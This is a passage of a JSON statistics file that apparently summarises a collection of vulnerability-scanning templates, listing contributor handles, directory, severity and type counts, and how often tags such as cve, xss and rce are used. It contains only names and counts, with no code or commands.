@yashanand155","count":3},{"name":"whoever","count":3},{"name":"f1tz","count":3},{"name":"evergreencartoons","count":3},{"name":"andydoering","count":3},{"name":"ekrause","count":3},{"name":"cheesymoon","count":3},{"name":"bernardofsr","count":3},{"name":"dr0pd34d","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"salts","count":3},{"name":"jarijaas","count":3},{"name":"_generic_human_","count":3},{"name":"splint3r7","count":3},{"name":"lark-lab","count":3},{"name":"skeltavik","count":3},{"name":"c4sper0","count":3},{"name":"davidmckennirey","count":3},{"name":"farish","count":3},{"name":"taielab","count":3},{"name":"ph33r","count":3},{"name":"vsh00t","count":3},{"name":"vagnerd","count":3},{"name":"randomrobbie","count":3},{"name":"xianke","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"thomas_from_offensity","count":3},{"name":"atomiczsec","count":3},{"name":"lucasljm2001","count":3},{"name":"matt galligan","count":3},{"name":"omranisecurity","count":3},{"name":"sushantkamble","count":3},{"name":"swissky","count":3},{"name":"binaryfigments","count":3},{"name":"j3ssie","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"emenalf","count":3},{"name":"aringo","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"isacaya","count":3},{"name":"dudez","count":3},{"name":"gevakun","count":2},{"name":"martincodes-de","count":2},{"name":"c3l3si4n","count":2},{"name":"clarkvoss","count":2},{"name":"0xrudra","count":2},{"name":"wa1tf0rme","count":2},{"name":"supras","count":2},{"name":"mohammedsaneem","count":2},{"name":"dogancanbakir","count":2},{"name":"y4er","count":2},{"name":"kre80r","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"brucelsone","count":2},{"name":"serrapa","count":2},{"name":"supr4s","count":2},{"name":"amsda","count":2},{"name":"ajaysenr","count":2},{"name":"redteambrasil","count":2},{"name":"zy9ard3","count":2},{"name":"mrharshvardhan","count":2},{"name":"vavkamil","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"luci","count":2},{"name":"florianmaak","count":2},{"name":"joshua rogers","count":2},{"name":"kiblyn11","count":2},{"name":"sbani","count":2},{"name":"thezakman","count":2},{"name":"nvn1729","count":2},{"name":"h0j3n","count":2},{"name":"ep1csage","count":2},{"name":"dahse89","count":2},{"name":"amirhossein raeisi","count":2},{"name":"codexlynx","count":2},{"name":"6mile","count":2},{"name":"hetroublemakr","count":2},{"name":"ree4pwn","count":2},{"name":"x1m_martijn","count":2},{"name":"geekby","count":2},{"name":"gal nagli","count":2},{"name":"charles d","count":2},{"name":"securityforeveryone","count":2},{"name":"bmcel","count":2},{"name":"sinkettu","count":2},{"name":"ayadim","count":2},{"name":"uomogrande","count":2},{"name":"k11h-de","count":2},{"name":"d4vy","count":2},{"name":"zomsop82","count":2},{"name":"egemenkochisarli","count":2},{"name":"foulenzer","count":2},{"name":"joshlarsen","count":2},{"name":"kishore-hariram","count":2},{"name":"paradessia","count":2},{"name":"rafaelwdornelas","count":2},{"name":"thardt-praetorian","count":2},{"name":"randomdhiraj","count":2},{"name":"korteke","count":2},{"name":"myztique","count":2},{"name":"github.com/its0x08","count":2},{"name":"raesene","count":2},{"name":"lstatro","count":2},{"name":"udit_thakkur","count":2},{"name":"paperpen","count":2},{"name":"shelled","count":2},{"name":"666asd","count":2},{"name":"n-thumann","count":2},{"name":"0xcrypto","count":2},{"name":"brenocss","count":2},{"name":"z0ne","count":2},{"name":"herry","count":2},{"name":"lotusdll","count":2},{"name":"notnotnotveg","count":2},{"name":"moritz nentwig","count":2},{"name":"usdag","count":2},{"name":"joeldeleep","count":2},{"name":"topscoder","count":2},{"name":"afaq","count":2},{"name":"convisoappsec","count":2},{"name":"bsysop","count":2},{"name":"arliya","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"v0idc0de","count":2},{"name":"mzack9999","count":2},{"name":"cocxanh","count":2},{"name":"0xelkomy","count":2},{"name":"manas_harsh","count":2},{"name":"bananabr","count":2},{"name":"hackerarpan","count":2},{"name":"pbuff07","count":2},{"name":"g4l1t0","count":2},{"name":"0xnirvana","count":2},{"name":"danielmofer","count":2},{"name":"dbrwsky","count":2},{"name":"danmcinerney","count":2},{"name":"liwermor","count":2},{"name":"koti2","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"davidegirardi","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"shankaracharya","count":2},{"name":"cckuakilong","count":2},{"name":"nuk3s3c","count":2},{"name":"thabisocn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"msegoviag","count":2},{"name":"ehsahil","count":2},{"name":"nkxxkn","count":2},{"name":"charles d.","count":2},{"name":"sy3omda","count":2},{"name":"christianpoeschl","count":2},{"name":"8arthur","count":2},{"name":"parzival","count":2},{"name":"0xsmiley","count":2},{"name":"socketz","count":2},{"name":"streetofhackerr007","count":2},{"name":"maximus decimus","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"sascha brendel","count":2},{"name":"t3l3machus","count":2},{"name":"bing0o","count":2},{"name":"thevillagehacker","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whotwagner","count":1},{"name":"zandros0","count":1},{"name":"ldionmarcil","count":1},{"name":"mchklt","count":1},{"name":"ilovebinbash","count":1},{"name":"iampritam","count":1},{"name":"jonathanwalker","count":1},{"name":"nuts7","count":1},{"name":"h4sh5","count":1},{"name":"abdullahisik","count":1},{"name":"nytr0gen","count":1},{"name":"unblvr1","count":1},{"name":"rinolock","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kr1shna4garwal","count":1},{"name":"httpvoid","count":1},{"name":"kurohost","count":1},{"name":"pascalheidmann","count":1},{"name":"mr.bobo hp","count":1},{"name":"rotembar","count":1},{"name":"arall","count":1},{"name":"joaonevess","count":1},{"name":"danigoland","count":1},{"name":"qlkwej","count":1},{"name":"pry0cc","count":1},{"name":"ransomsec","count":1},{"name":"th3r4id","count":1},{"name":"b4uh0lz","count":1},{"name":"xc1ym","count":1},{"name":"kresec","count":1},{"name":"david botelho mariano","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"exid","count":1},{"name":"jacalynli","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"schniggie","count":1},{"name":"jna1","count":1},{"name":"noobexploiter","count":1},{"name":"mlec","count":1},{"name":"arqsz","count":1},{"name":"co0nan","count":1},{"name":"fpatrik","count":1},{"name":"0xrod","count":1},{"name":"shockwave","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"clment cruchet","count":1},{"name":"breno_css","count":1},{"name":"hardik-rathod","count":1},{"name":"0xtavian","count":1},{"name":"puben","count":1},{"name":"lrtk-coder","count":1},{"name":"nerrorsec","count":1},{"name":"yiran","count":1},{"name":"jas37","count":1},{"name":"pdp","count":1},{"name":"shiva (strobes security)","count":1},{"name":"jaimin gondaliya","count":1},{"name":"akokonunes","count":1},{"name":"gpiechnik2","count":1},{"name":"retr02332","count":1},{"name":"failopen","count":1},{"name":"mass0ma","count":1},{"name":"mukundbhuva","count":1},{"name":"mayank_pandey01","count":1},{"name":"berkdusunur","count":1},{"name":"soyelmago","count":1},{"name":"couskito","count":1},{"name":"jteles","count":1},{"name":"furkansayim","count":1},{"name":"osamahamad","count":1},{"name":"lbb","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"justmumu","count":1},{"name":"jeya seelan","count":1},{"name":"0xceba","count":1},{"name":"mantissts","count":1},{"name":"aaronchen0","count":1},{"name":"apt-mirror","count":1},{"name":"freakyclown","count":1},{"name":"vzamanillo","count":1},{"name":"igibanez","count":1},{"name":"shreyapohekar","count":1},{"name":"sinsinology","count":1},{"name":"metascan","count":1},{"name":"udyz","count":1},{"name":"abbas.heybati","count":1},{"name":"tea","count":1},{"name":"tirtha","count":1},{"name":"bjhulst","count":1},{"name":"jiheon-dev","count":1},{"name":"amanrawat","count":1},{"name":"jbertman","count":1},{"name":"viniciuspereiras","count":1},{"name":"nagli","count":1},{"name":"toufik-airane","count":1},{"name":"jc175","count":1},{"name":"savik","count":1},{"name":"pjborah","count":1},{"name":"ramondunker","count":1},{"name":"miroslavsotak","count":1},{"name":"dmartyn","count":1},{"name":"bad5ect0r","count":1},{"name":"natto97","count":1},{"name":"_harleo","count":1},{"name":"hakimkt","count":1},{"name":"pussycat0","count":1},{"name":"sanineng","count":1},{"name":"millermedia","count":1},{"name":"hakluke","count":1},{"name":"alex","count":1},{"name":"ooooooo_q","count":1},{"name":"francescocarlucci","count":1},{"name":"technicaljunkie","count":1},{"name":"mesaglio","count":1},{"name":"napgh0st","count":1},{"name":"christbowel","count":1},{"name":"drewvravick","count":1},{"name":"lark lab","count":1},{"name":"un-fmunozs","count":1},{"name":"xcapri","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"sospiro","count":1},{"name":"micha3lb3n","count":1},{"name":"iphantasmic","count":1},{"name":"infosecsanyam","count":1},{"name":"carlosvieira","count":1},{"name":"majidmc2","count":1},{"name":"screamy","count":1},{"name":"rodnt","count":1},{"name":"narluin","count":1},{"name":"sherlocksecurity","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manasmbellani","count":1},{"name":"nielsing","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"calumjelrick","count":1},{"name":"ofjaaah","count":1},{"name":"flag007","count":1},{"name":"jub0bs","count":1},{"name":"rojanrijal","count":1},{"name":"mariam tariq","count":1},{"name":"mordavid","count":1},{"name":"w8ay","count":1},{"name":"kagamigawa","count":1},{"name":"remonsec","count":1},{"name":"phillipo","count":1},{"name":"thirukrishnan","count":1},{"name":"hczdmr","count":1},{"name":"jadu101","count":1},{"name":"luqman","count":1},{"name":"d4ly","count":1},{"name":"yuansec","count":1},{"name":"zhenwarx","count":1},{"name":"manuelbua","count":1},{"name":"ahmed abou-ela","count":1},{"name":"thebinitghimire","count":1},{"name":"ling","count":1},{"name":"queencitycyber","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"amirmsafari","count":1},{"name":"ledoubletake","count":1},{"name":"0xcharan","count":1},{"name":"palanichamy_perumal","count":1},{"name":"defektive","count":1},{"name":"josecosta","count":1},{"name":"droberson","count":1},{"name":"fq_hsu","count":1},{"name":"vikas kundu","count":1},{"name":"dwbzn","count":1},{"name":"tirtha_mandal","count":1},{"name":"jfbes","count":1},{"name":"omarkurt","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"am0nt31r0","count":1},{"name":"alevsk","count":1},{"name":"xshuden","count":1},{"name":"myst7ic","count":1},{"name":"bywalks","count":1},{"name":"rubina119","count":1},{"name":"dali","count":1},{"name":"becivells","count":1},{"name":"duty_1g","count":1},{"name":"open-sec","count":1},{"name":"bartu utku sarp","count":1},{"name":"shiar","count":1},{"name":"th3.d1p4k","count":1},{"name":"xeldax","count":1},{"name":"official_blackhat13","count":1},{"name":"noamrathaus","count":1},{"name":"b0yd","count":1},{"name":"rotemreiss","count":1},{"name":"ok_bye_now","count":1},{"name":"opencirt","count":1},{"name":"8authur","count":1},{"name":"revblock","count":1},{"name":"piyushchhiroliya","count":1},{"name":"mah3sec_","count":1},{"name":"h4kux","count":1},{"name":"regala_","count":1},{"name":"danfaizer","count":1},{"name":"aresx","count":1},{"name":"adilsoybali","count":1},{"name":"makyotox","count":1},{"name":"push4d","count":1},{"name":"smaranchand","count":1},{"name":"yashanand155","count":1},{"name":"professorabhay","count":1},{"name":"d0rkerdevil","count":1},{"name":"chesterblue","count":1},{"name":"dk999","count":1},{"name":"yavolo","count":1},{"name":"null_hypothesis","count":1},{"name":"amir-h-fallahi","count":1},{"name":"0xkayala","count":1},{"name":"kareemse1im","count":1},{"name":"cbadke","count":1},{"name":"mrcl0wnlab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"axrk","count":1},{"name":"fmunozs","count":1},{"name":"notwhy","count":1},{"name":"unp4ck","count":1},{"name":"chron0x","count":1},{"name":"davidfegyver","count":1},{"name":"marcos_iaf","count":1},{"name":"fopina","count":1},{"name":"_darrenmartyn","count":1},{"name":"juicypotato1","count":1},{"name":"hateshape","count":1},{"name":"sdcampbell","count":1},{"name":"phyr3wall","count":1},{"name":"w0tx","count":1},{"name":"zeyad azima","count":1},{"name":"adrianmf","count":1},{"name":"alperenkesk","count":1},{"name":"adamparsons","count":1},{"name":"miguelsegoviagil","count":1},{"name":"higor melgaço","count":1},{"name":"adnanekhan","count":1},{"name":"elder tao","count":1},{"name":"realexp3rt","count":1},{"name":"luciannitescu","count":1},{"name":"erethon","count":1},{"name":"stupidfish","count":1},{"name":"vulnspace","count":1},{"name":"hyunsoo-ds","count":1},{"name":"chetgan","count":1},{"name":"zn9988","count":1},{"name":"win3zz","count":1},{"name":"0ut0fb4nd","count":1},{"name":"f1she3","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"aayush vishnoi","count":1},{"name":"tim_koopmans","count":1},{"name":"kchason","count":1},{"name":"ky9oss","count":1},{"name":"charanrayudu","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kiks7","count":1},{"name":"denandz","count":1},{"name":"0xprial","count":1},{"name":"philippdelteil","count":1},{"name":"momen eldawakhly","count":1},{"name":"evolutionsec","count":1},{"name":"skylark-lab","count":1},{"name":"harryha","count":1},{"name":"ahmed sherif","count":1},{"name":"ruppde","count":1},{"name":"pepitoh","count":1},{"name":"brabbit10","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"diablo","count":1},{"name":"s1r1u5_","count":1},{"name":"lady_bug","count":1},{"name":"notsoevilweasel","count":1},{"name":"ritesh_gohil(#l4stpl4y3r)","count":1},{"name":"patralos","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"r3nz0","count":1},{"name":"sorrowx3","count":1},{"name":"imhunterand","count":1},{"name":"mbmy","count":1},{"name":"yashgoti","count":1},{"name":"ap3r","count":1},{"name":"juliosmelo","count":1},{"name":"booboohq","count":1},{"name":"amnotacat","count":1},{"name":"unknown","count":1},{"name":"viondexd","count":1},{"name":"ptonewreckin","count":1},{"name":"andirrahmani1","count":1},{"name":"dorkerdevil","count":1},{"name":"mubassirpatel","count":1},{"name":"bjxsec","count":1},{"name":"mayankpandey01","count":1},{"name":"sshell","count":1},{"name":"xstp","count":1},{"name":"apple","count":1},{"name":"wabafet","count":1},{"name":"marcio mendes","count":1},{"name":"pudsec","count":1},{"name":"shivanshkhari","count":1},{"name":"udinchan","count":1},{"name":"jeya.seelan","count":1},{"name":"shifacyclewla","count":1},{"name":"0xh7ml","count":1},{"name":"erikowen","count":1},{"name":"5up3r541y4n","count":1},{"name":"daviey","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"arjunchandarana","count":1},{"name":"wlayzz","count":1},{"name":"lethargynavigator","count":1},{"name":"husain","count":1},{"name":"olewagner","count":1},{"name":"borna nematzadeh","count":1},{"name":"kailashbohara","count":1},{"name":"f0xy","count":1},{"name":"lixts","count":1},{"name":"kabirsuda","count":1},{"name":"y0no","count":1},{"name":"x6263","count":1},{"name":"djoevanka","count":1},{"name":"evan rubinstien","count":1},{"name":"ramkrishna sawant","count":1},{"name":"esonhugh","count":1},{"name":"sickwell","count":1},{"name":"jbaines-r7","count":1},{"name":"ipanda","count":1},{"name":"0xd0ff9","count":1},{"name":"galoget","count":1},{"name":"dabla","count":1},{"name":"therealtoastycat","count":1},{"name":"invisiblethreat","count":1},{"name":"intx0x80","count":1},{"name":"rschio","count":1},{"name":"ynnirc","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"luqmaan hadia","count":1},{"name":"deena","count":1},{"name":"rumble773","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"unkl4b","count":1},{"name":"compr00t","count":1},{"name":"exploitation","count":1},{"name":"akash.c","count":1},{"name":"yaser_s","count":1},{"name":"miryangjung","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sec_hawk","count":1},{"name":"absshax","count":1},{"name":"r3s ost","count":1},{"name":"yusakie","count":1},{"name":"hanlaomo","count":1},{"name":"none","count":1},{"name":"jaskaran","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"aaban solutions","count":1},{"name":"anon-artist","count":1},{"name":"alexrydzak","count":1},{"name":"bughuntersurya","count":1},{"name":"themiddle","count":1},{"name":"whynotke","count":1},{"name":"ringo","count":1},{"name":"patrick pirker","count":1},{"name":"bugvsme","count":1},{"name":"guax1","count":1},{"name":"m0ck3d","count":1},{"name":"watchtowr","count":1},{"name":"floriandewald","count":1},{"name":"ahmetpergamum","count":1},{"name":"ph33rr","count":1},{"name":"harshinsecurity","count":1},{"name":"carrot2","count":1},{"name":"thelicato","count":1},{"name":"dale clarke","count":1},{"name":"k3rwin","count":1},{"name":"rivalsec","count":1},{"name":"high","count":1},{"name":"izn0u","count":1},{"name":"babybash","count":1},{"name":"sttlr","count":1},{"name":"archer","count":1},{"name":"retr0","count":1},{"name":"lamscun","count":1},{"name":"fur1na","count":1},{"name":"nobody","count":1},{"name":"knassar702","count":1},{"name":"exceed","count":1},{"name":"aron molnar","count":1},{"name":"sicksec","count":1},{"name":"mammad_rahimzada","count":1},{"name":"banana69","count":1},{"name":"dievus","count":1},{"name":"kaizensecurity","count":1},{"name":"eremit4","count":1},{"name":"s1r1us","count":1},{"name":"petruknisme","count":1},{"name":"zsusac","count":1},{"name":"youngpope","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"naglis","count":1},{"name":"oscarintherocks","count":1},{"name":"godfatherorwa","count":1},{"name":"michal-mikolas","count":1},{"name":"anonymous","count":1},{"name":"omarjezi","count":1},{"name":"0xteles","count":1},{"name":"andysvints","count":1},{"name":"vinit989","count":1},{"name":"ndmalc","count":1},{"name":"orpheus","count":1},{"name":"act1on3","count":1},{"name":"irshadahamed","count":1},{"name":"jcockhren","count":1},{"name":"icarot","count":1},{"name":"tangxiaofeng7","count":1},{"name":"dawid-czarnecki","count":1},{"name":"domenicoveneziano","count":1},{"name":"1nf1n7y","count":1},{"name":"willd96","count":1},{"name":"geraldino2","count":1},{"name":"elitebaz","count":1},{"name":"sechunt3r","count":1},{"name":"elouhi","count":1},{"name":"brianlam38","count":1},{"name":"akshansh","count":1},{"name":"pwnwithlove","count":1},{"name":"j33n1k4","count":1},{"name":"jrolf","count":1},{"name":"mihhailsokolov","count":1},{"name":"allenwest24","count":1},{"name":"pphuahua","count":1},{"name":"ayadi","count":1},{"name":"af001","count":1},{"name":"aringo-bf","count":1},{"name":"sak1","count":1},{"name":"pratik khalane","count":1},{"name":"petergrifin","count":1},{"name":"houdinis","count":1},{"name":"hlop","count":1},{"name":"2rs3c","count":1},{"name":"noah @thesubtlety","count":1},{"name":"secthebit","count":1},{"name":"lingtren","count":1},{"name":"shelld3v","count":1},{"name":"b0rn2r00t","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0h1in9e","count":1},{"name":"hotpot","count":1},{"name":"n0el4kls","count":1},{"name":"dhiyanesdk","count":1},{"name":"byobin","count":1},{"name":"gonski","count":1},{"name":"ola456","count":1},{"name":"prettyboyaaditya","count":1},{"name":"zinminphy0","count":1},{"name":"paper-pen","count":1},{"name":"caon","count":1},{"name":"mabdullah22","count":1},{"name":"mhdsamx","count":1},{"name":"tehtbl","count":1},{"name":"barthy.koeln","count":1},{"name":"colbyjack1134","count":1},{"name":"elmahdi","count":1},{"name":"spac3wh1te","count":1},{"name":"cravaterouge","count":1},{"name":"drfabiocastro","count":1},{"name":"carson chan","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"0xparth","count":1},{"name":"undefl0w","count":1},{"name":"aravind","count":1},{"name":"kiransau","count":1},{"name":"ohlinge","count":1},{"name":"p-l-","count":1},{"name":"hazana","count":1},{"name":"0xceeb","count":1},{"name":"hexcat","count":1},{"name":"wpsec","count":1},{"name":"matt miller","count":1},{"name":"michael wedl","count":1},{"name":"west-wise","count":1},{"name":"daffianfo","count":1},{"name":"furkansenan","count":1},{"name":"shivampand3y","count":1},{"name":"qianbenhyu","count":1},{"name":"arr0way","count":1},{"name":"numan türle","count":1},{"name":"liquidsec","count":1}],"directory":[{"name":"http","count":7546},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":134},{"name":"cloud","count":99},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":12},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"passive","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3697},{"name":"high","count":1770},{"name":"medium","count":1528},{"name":"critical","count":1043},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25},{"name":"http","count":2}]} +{"tags":[{"name":"cve","count":2511},{"name":"panel","count":1157},{"name":"wordpress","count":983},{"name":"exposure","count":948},{"name":"xss","count":911},{"name":"wp-plugin","count":852},{"name":"osint","count":804},{"name":"tech","count":686},{"name":"lfi","count":662},{"name":"misconfig","count":659},{"name":"rce","count":600},{"name":"edb","count":599},{"name":"packetstorm","count":544},{"name":"wpscan","count":502},{"name":"cve2021","count":491},{"name":"cve2022","count":479},{"name":"wp","count":426},{"name":"cve2023","count":380},{"name":"unauth","count":367},{"name":"sqli","count":364},{"name":"file","count":346},{"name":"authenticated","count":343},{"name":"intrusive","count":302},{"name":"detect","count":295},{"name":"login","count":284},{"name":"kev","count":275},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"default-login","count":216},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"network","count":195},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":191},{"name":"devops","count":177},{"name":"cve2018","count":170},{"name":"iot","count":167},{"name":"cve2019","count":164},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"malware","count":142},{"name":"tcp","count":136},{"name":"redirect","count":135},{"name":"aws","count":134},{"name":"cloud","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":117},{"name":"files","count":113},{"name":"cms","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":90},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"cve2024","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":73},{"name":"oss","count":68},{"name":"js","count":67},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"detection","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"osint-gaming","count":45},{"name":"php","count":45},{"name":"aem","count":45},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"jndi","count":44},{"name":"generic","count":43},{"name":"deserialization","count":43},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"traversal","count":42},{"name":"microsoft","count":42},{"name":"cnvd","count":41},{"name":"springboot","count":41},{"name":"misc","count":40},{"name":"miscellaneous","count":38},{"name":"injection","count":38},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"kubernetes","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"fuzz","count":34},{"name":"ssl","count":33},{"name":"tls","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":30},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"k8s","count":28},{"name":"fortinet","count":28},{"name":"dns","count":27},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"ssh","count":26},{"name":"cve2012","count":26},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"zohocorp","count":26},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"zoho","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"file-upload","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"yonyou","count":23},{"name":"prestashop","count":22},{"name":"s3","count":22},{"name":"github","count":22},{"name":"cicd","count":22},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"dast","count":21},{"name":"ecology","count":21},{"name":"printer","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"ftp","count":20},{"name":"confluence","count":19},{"name":"hp","count":19},{"name":"struts","count":19},{"name":"rukovoditel","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"ruijie","count":18},{"name":"node.js","count":18},{"name":"vpn","count":18},{"name":"mail","count":17},{"name":"honeypot","count":17},{"name":"nginx","count":17},{"name":"microweber","count":17},{"name":"azure","count":17},{"name":"headless","count":17},{"name":"magento","count":16},{"name":"alibaba","count":16},{"name":"rconfig","count":16},{"name":"osint-blog","count":16},{"name":"backup","count":16},{"name":"service","count":16},{"name":"jarm","count":16},{"name":"status","count":16},{"name":"cve2009","count":16},{"name":"backdoor","count":16},{"name":"ssti","count":15},{"name":"nagios","count":15},{"name":"zyxel","count":15},{"name":"ruby","count":15},{"name":"setup","count":15},{"name":"moosocial","count":15},{"name":"seeyon","count":15},{"name":"cve2008","count":15},{"name":"cnvd2021","count":15},{"name":"woocommerce","count":15},{"name":"java","count":15},{"name":"installer","count":15},{"name":"tongda","count":15},{"name":"netgear","count":15},{"name":"cve2013","count":15},{"name":"redhat","count":15},{"name":"nodejs","count":15},{"name":"bypass","count":15},{"name":"dashboard","count":15},{"name":"osint-art","count":14},{"name":"docker","count":14},{"name":"jboss","count":14},{"name":"domainmod","count":14},{"name":"npm","count":14},{"name":"redis","count":14},{"name":"info-leak","count":14},{"name":"rds","count":14},{"name":"creds-stuffing","count":14},{"name":"auth","count":14},{"name":"dell","count":14},{"name":"osint-health","count":14},{"name":"node","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"ivanti","count":14},{"name":"icewarp","count":14},{"name":"git","count":14},{"name":"osint-political","count":13},{"name":"fuzzing","count":13},{"name":"rails","count":13},{"name":"airflow","count":13},{"name":"fortigate","count":13},{"name":"cuppacms","count":13},{"name":"hashicorp","count":13},{"name":"postgresql","count":13},{"name":"laravel","count":13},{"name":"cuppa","count":13},{"name":"mysql","count":13},{"name":"windows","count":13},{"name":"osint-dating","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"abstractapi","count":13},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"smb","count":12},{"name":"drupal","count":12},{"name":"netsweeper","count":12},{"name":"webserver","count":12},{"name":"newrelic","count":12},{"name":"phpgurukul","count":12},{"name":"jetbrains","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"kafka","count":12},{"name":"django","count":11},{"name":"fastjson","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"glpi","count":11},{"name":"prometheus","count":11},{"name":"cache","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"xstream","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"dedecms","count":11},{"name":"iis","count":11},{"name":"phpmyadmin","count":11},{"name":"jolokia","count":11},{"name":"sitecore","count":10},{"name":"solarview","count":10},{"name":"crlf","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"dropbox","count":10},{"name":"elasticsearch","count":10},{"name":"progress","count":10},{"name":"zabbix","count":10},{"name":"samsung","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"dahua","count":10},{"name":"digitalocean","count":10},{"name":"secret","count":9},{"name":"moodle","count":9},{"name":"joomla\\!","count":9},{"name":"firebase","count":9},{"name":"gitea","count":9},{"name":"wso2","count":9},{"name":"python","count":9},{"name":"exchange","count":9},{"name":"elastic","count":9},{"name":"lucee","count":9},{"name":"sophos","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"vcenter","count":9},{"name":"blind","count":9},{"name":"versa","count":9},{"name":"f5","count":9},{"name":"cnvd2020","count":9},{"name":"sangfor","count":9},{"name":"pfsense","count":9},{"name":"console","count":9},{"name":"opencats","count":9},{"name":"kube","count":9},{"name":"druid","count":9},{"name":"facebook","count":9},{"name":"cloudtrail","count":9},{"name":"gateway","count":9},{"name":"mirai","count":8},{"name":"phpinfo","count":8},{"name":"nagiosxi","count":8},{"name":"unauthenticated","count":8},{"name":"microfocus","count":8},{"name":"lfprojects","count":8},{"name":"spotweb_project","count":8},{"name":"go","count":8},{"name":"instrusive","count":8},{"name":"e-office","count":8},{"name":"phpjabbers","count":8},{"name":"emerge","count":8},{"name":"metadata","count":8},{"name":"bucket","count":8},{"name":"spotweb","count":8},{"name":"default-page","count":8},{"name":"cisco-switch","count":8},{"name":"odoo","count":8},{"name":"manager","count":8},{